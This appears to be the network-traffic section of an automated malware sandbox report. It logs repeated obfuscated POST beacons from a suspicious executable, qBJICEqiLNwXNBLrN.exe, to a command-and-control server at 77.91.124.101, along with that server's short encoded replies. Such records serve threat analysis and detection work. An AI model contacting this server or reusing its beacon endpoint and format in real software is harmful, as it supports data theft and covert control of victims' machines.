                                                            12477.91.124.10180192.168.2.549839C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:49.065499067 CET647OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:49.267235994 CET647INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:49.267549038 CET650OUTData Raw: 57 5b 58 5e 5b 5c 5f 59 5d 57 55 57 55 5e 57 50 50 59 58 42 56 57 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W[X^[\_Y]WUWU^WPPYXBVWWZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'^*1^(+9*07;$] 9+3&>:S33%.>?<8.&G''^)+
                                                            Nov 21, 2023 04:48:49.470273018 CET650INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:49 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            12577.91.124.10180192.168.2.549840C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:50.064968109 CET651OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:50.263237000 CET651INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:51.500138998 CET654OUTData Raw: 57 51 58 5f 5b 53 5a 5c 5d 57 55 57 55 59 57 50 50 5a 58 42 56 54 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WQX_[SZ\]WUWUYWPPZXBVTW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'Y)(1(%)#_,$64\)<#"Q0=90.S9;>?'Y-.&G''^)
                                                            Nov 21, 2023 04:48:51.702452898 CET655INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:50 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            125192.168.2.54984077.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:50.064968109 CET651OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:50.263237000 CET651INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:51.500138998 CET654OUTData Raw: 57 51 58 5f 5b 53 5a 5c 5d 57 55 57 55 59 57 50 50 5a 58 42 56 54 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WQX_[SZ\]WUWUYWPPZXBVTW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'Y)(1(%)#_,$64\)<#"Q0=90.S9;>?'Y-.&G''^)
                                                            Nov 21, 2023 04:48:51.702452898 CET655INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:50 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            12677.91.124.10180192.168.2.549841C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:51.698138952 CET655OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1408
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:51.894644976 CET656INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:51.895076990 CET657OUTData Raw: 52 5a 58 59 5e 5e 5a 5b 5d 57 55 57 55 58 57 53 50 59 58 44 56 5e 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RZXY^^Z[]WUWUXWSPYXDV^WY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$);=^<;-?0#^.$) 9!X(39$-W'.;=</#/>&G''^)?
                                                            Nov 21, 2023 04:48:52.096456051 CET661INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:51 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 21 00 25 2c 20 58 21 20 2f 57 29 39 29 19 2d 58 39 1a 3c 55 29 5e 31 5b 20 12 27 39 0f 54 3c 01 3c 5d 33 07 30 13 23 50 2c 5b 2a 30 21 5a 0c 1d 26 18 22 38 30 0d 28 10 3f 01 2b 13 28 18 26 1f 2f 14 2b 3e 0e 0c 20 0d 3f 58 25 23 20 1a 38 06 2e 03 2d 28 00 45 25 12 32 5f 37 2d 23 5f 0c 14 27 50 36 0f 0d 5e 20 09 22 56 22 37 16 15 20 0a 28 0e 30 04 28 1c 26 3b 22 05 28 3b 30 57 32 0e 24 50 33 29 33 1d 32 39 01 1c 28 2a 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: !%, X! /W)9)-X9<U)^1[ '9T<<]30#P,[*0!Z&"80(?+(&/+> ?X%# 8.-(E%2_7-#_'P6^ "V"7 (0(&;"(;0W2$P3)329(*&T*+H6ZP


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            126192.168.2.54984177.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:51.698138952 CET655OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1408
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:51.894644976 CET656INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:51.895076990 CET657OUTData Raw: 52 5a 58 59 5e 5e 5a 5b 5d 57 55 57 55 58 57 53 50 59 58 44 56 5e 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RZXY^^Z[]WUWUXWSPYXDV^WY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$);=^<;-?0#^.$) 9!X(39$-W'.;=</#/>&G''^)?
                                                            Nov 21, 2023 04:48:52.096456051 CET661INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:51 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 21 00 25 2c 20 58 21 20 2f 57 29 39 29 19 2d 58 39 1a 3c 55 29 5e 31 5b 20 12 27 39 0f 54 3c 01 3c 5d 33 07 30 13 23 50 2c 5b 2a 30 21 5a 0c 1d 26 18 22 38 30 0d 28 10 3f 01 2b 13 28 18 26 1f 2f 14 2b 3e 0e 0c 20 0d 3f 58 25 23 20 1a 38 06 2e 03 2d 28 00 45 25 12 32 5f 37 2d 23 5f 0c 14 27 50 36 0f 0d 5e 20 09 22 56 22 37 16 15 20 0a 28 0e 30 04 28 1c 26 3b 22 05 28 3b 30 57 32 0e 24 50 33 29 33 1d 32 39 01 1c 28 2a 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: !%, X! /W)9)-X9<U)^1[ '9T<<]30#P,[*0!Z&"80(?+(&/+> ?X%# 8.-(E%2_7-#_'P6^ "V"7 (0(&;"(;0W2$P3)329(*&T*+H6ZP


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            127192.168.2.54984277.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:51.831931114 CET656OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:52.030527115 CET658INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:52.031117916 CET660OUTData Raw: 52 5b 58 50 5b 5c 5f 5e 5d 57 55 57 55 5b 57 53 50 59 58 46 56 5f 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R[XP[\_^]WUWU[WSPYXFV_W_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'*<+=U;_,'.^ 2(#-$-.3 19(&(<+->&G''^)3
                                                            Nov 21, 2023 04:48:52.234703064 CET661INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:51 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            12777.91.124.10180192.168.2.549842C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:51.831931114 CET656OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:52.030527115 CET658INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:52.031117916 CET660OUTData Raw: 52 5b 58 50 5b 5c 5f 5e 5d 57 55 57 55 5b 57 53 50 59 58 46 56 5f 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R[XP[\_^]WUWU[WSPYXFV_W_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'*<+=U;_,'.^ 2(#-$-.3 19(&(<+->&G''^)3
                                                            Nov 21, 2023 04:48:52.234703064 CET661INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:51 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            128192.168.2.54984377.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:52.554563046 CET662OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:48:52.759457111 CET662INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:52.759687901 CET665OUTData Raw: 52 5a 58 50 5b 5d 5f 5e 5d 57 55 57 55 57 57 52 50 53 58 48 56 57 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RZXP[]_^]WUWUWWRPSXHVWW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_)^5X?=>30,B6Z :9(9$[='3.,;<8/&G''^)
                                                            Nov 21, 2023 04:48:52.963704109 CET665INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:52 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            12877.91.124.10180192.168.2.549843C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:52.554563046 CET662OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:48:52.759457111 CET662INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:52.759687901 CET665OUTData Raw: 52 5a 58 50 5b 5d 5f 5e 5d 57 55 57 55 57 57 52 50 53 58 48 56 57 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RZXP[]_^]WUWUWWRPSXHVWW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_)^5X?=>30,B6Z :9(9$[='3.,;<8/&G''^)
                                                            Nov 21, 2023 04:48:52.963704109 CET665INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:52 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            129192.168.2.54984477.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:53.289393902 CET666OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:48:53.486891031 CET666INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:53.487193108 CET668OUTData Raw: 52 5c 5d 5b 5e 58 5f 59 5d 57 55 57 55 59 57 5a 50 5d 58 48 56 52 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R\][^X_Y]WUWUYWZP]XHVRWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'*![?+!?3(85 :9?*R$=*0).+)><;;&G''^)
                                                            Nov 21, 2023 04:48:53.689637899 CET669INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:53 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            12977.91.124.10180192.168.2.549844C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:53.289393902 CET666OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:48:53.486891031 CET666INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:53.487193108 CET668OUTData Raw: 52 5c 5d 5b 5e 58 5f 59 5d 57 55 57 55 59 57 5a 50 5d 58 48 56 52 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R\][^X_Y]WUWUYWZP]XHVRWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'*![?+!?3(85 :9?*R$=*0).+)><;;&G''^)
                                                            Nov 21, 2023 04:48:53.689637899 CET669INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:53 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            1377.91.124.10180192.168.2.549725C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:34.678030968 CET193OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:34.875669003 CET193INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:34.875929117 CET196OUTData Raw: 52 5b 58 5a 5b 5f 5f 5a 5d 57 55 57 55 59 57 50 50 5f 58 48 56 52 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R[XZ[__Z]WUWUYWPP_XHVRW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*6=+T=(/$] 5(3>9$#.V:>_<7;&G''^)
                                                            Nov 21, 2023 04:47:35.080408096 CET196INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:34 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            13192.168.2.54972577.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:34.678030968 CET193OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:34.875669003 CET193INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:34.875929117 CET196OUTData Raw: 52 5b 58 5a 5b 5f 5f 5a 5d 57 55 57 55 59 57 50 50 5f 58 48 56 52 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
